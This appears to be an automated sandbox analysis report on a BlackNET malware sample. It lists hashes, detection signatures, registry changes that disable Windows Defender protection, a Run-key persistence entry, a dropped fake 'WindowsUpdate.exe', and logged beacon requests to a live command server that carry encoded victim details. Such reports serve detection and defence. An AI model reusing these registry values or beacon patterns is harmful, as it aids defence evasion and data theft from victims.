Analysis
-
max time kernel
120s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 11:34
Behavioral task
behavioral1
Sample
302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
Resource
win10v2004-20241007-en
General
-
Target
302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
-
Size
80KB
-
MD5
05644c696c4cfcd50af83ac4e2f1ff50
-
SHA1
b6cc01ee14e43facaccf9bfa7007481bb1e04751
-
SHA256
302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7
-
SHA512
ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab
-
SSDEEP
1536:dPvK/3zvzVQtCsscKvWBjzJxuOmb54vHTL6lm:diqCspZzVmb5uHv6lm
Malware Config
Signatures
-
BlackNET payload 1 IoCs
resource yara_rule behavioral2/files/0x000e000000023a84-18.dat family_blacknet -
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x000e000000023a84-18.dat disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe -
Executes dropped EXE 1 IoCs
pid Process 3264 WindowsUpdate.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cde2f914e4cce7f13b2c1cec7b6da970 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft\\MyClient\\WindowsUpdate.exe" 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 3356 powershell.exe 3356 powershell.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe 3264 WindowsUpdate.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 3264 WindowsUpdate.exe Token: SeDebugPrivilege 8 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4132 wrote to memory of 3356 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 90 PID 4132 wrote to memory of 3356 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 90 PID 4132 wrote to memory of 3264 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 92 PID 4132 wrote to memory of 3264 4132 302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe 92 PID 3264 wrote to memory of 8 3264 WindowsUpdate.exe 94 PID 3264 wrote to memory of 8 3264 WindowsUpdate.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe"C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
Network
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestlovegunny.netIN AResponselovegunny.netIN A103.27.237.159
-
GEThttps://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exeRemote address:103.27.237.159:443RequestGET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
Host: lovegunny.net
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:56 GMT
Content-Length: 1245
-
GEThttps://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exeRemote address:103.27.237.159:443RequestGET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:56 GMT
Content-Length: 1245
-
GEThttps://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exeRemote address:103.27.237.159:443RequestGET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:56 GMT
Content-Length: 1245
-
Remote address:8.8.8.8:53Request140.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request159.237.27.103.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
GEThttps://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=WindowsUpdate.exeRemote address:103.27.237.159:443RequestGET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
Host: lovegunny.net
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:34:59 GMT
Content-Length: 1245
-
GEThttps://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEzWindowsUpdate.exeRemote address:103.27.237.159:443RequestGET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:35:00 GMT
Content-Length: 1245
-
Remote address:103.27.237.159:443RequestGET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:35:00 GMT
Content-Length: 1245
-
GEThttps://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEzWindowsUpdate.exeRemote address:103.27.237.159:443RequestGET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
Host: lovegunny.net
ResponseHTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://localhost:3000
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Date: Wed, 23 Oct 2024 11:35:00 GMT
Content-Length: 1245
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request99.209.201.84.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request77.190.18.2.in-addr.arpaIN PTRResponse77.190.18.2.in-addr.arpaIN PTRa2-18-190-77deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request205.47.74.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 673255
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AE10BA836F1E40609CB3644ED6232B77 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:46Z
date: Wed, 23 Oct 2024 11:36:46 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 668226
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AA745BDB1228441D8161E1E5421BB41A Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 944899
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3F65CA758BBA43F2A4FA8E6F88C5EBE1 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 579336
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 10432A1722B0409BA88A038D88889B27 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 761345
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9A882466A33B49C89EF50A6F5B09EEE0 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.28.10:443RequestGET /th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 837003
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6FFCCED3731B42B19DDE5EFEC91DC819 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
date: Wed, 23 Oct 2024 11:36:47 GMT
-
Remote address:8.8.8.8:53Request10.28.171.150.in-addr.arpaIN PTRResponse
-
103.27.237.159:443https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEztls, http302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe1.3kB 8.8kB 12 11
HTTP Request
GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=HTTP Response
404HTTP Request
GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEzHTTP Response
404HTTP Request
GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEzHTTP Response
404 -
103.27.237.159:443https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEztls, httpWindowsUpdate.exe1.4kB 8.9kB 13 12
HTTP Request
GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=HTTP Response
404HTTP Request
GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEzHTTP Response
404HTTP Request
GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEzHTTP Response
404 -
103.27.237.159:443https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEztls, httpWindowsUpdate.exe698 B 1.9kB 7 5
HTTP Request
GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEzHTTP Response
404 -
1.6kB 7.3kB 17 13
-
1.5kB 6.9kB 16 13
-
1.5kB 6.9kB 16 13
-
1.3kB 662 B 12 8
-
150.171.28.10:443https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90tls, http2157.9kB 4.6MB 3344 3339
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
